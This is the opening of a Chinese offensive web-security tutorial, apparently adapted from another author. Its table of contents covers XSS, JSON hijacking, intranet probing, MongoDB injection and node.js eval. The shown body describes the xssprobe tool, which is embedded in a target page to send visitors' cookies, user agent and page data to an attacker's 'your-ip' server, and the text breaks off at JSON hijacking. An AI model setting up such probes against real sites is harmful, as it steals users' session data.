未经许可,不得转载。
原作者余弦,本文对原文进行二次创作。
文章目录
- 基本隐私收集
- XSS探针
- JSON 劫持
- 内网浅渗透
- 内网IP获取
- 内网IP端口获取
- 内网主机存活获取
- 路由Web控制台操作
- 内网脆弱Web应用控制
- 突破浏览器边界
- XSS Virus攻击
- MongoDB
- 数组绕过注入攻击
- MongoDB 查询条件绕过(Bypass)与 PHP 传参漏洞
- JavaScript 注入攻击
- node.js
- 瘟神eval
- 本地文件包含
基本隐私收集
XSS探针
项目地址:
https://github.com/evilcos/xssprobe
用途:获取目标网站的通用数据,包括 referer、location、toplocation、cookie、domain、title、screen、flash 、browser、ua、lang 等。
使用步骤
-
对 probe.js 进行修改,将 http_server 配置为自己的 probe.php 网址,格式如 http_server = “http://your-ip/xssprobe/probe.php?c=”; 。
-
在目标页面中嵌入 probe.js 脚本,具体操作可参考 demo.html。
例图:
JSON 劫持
JSON 是一种常用于数据交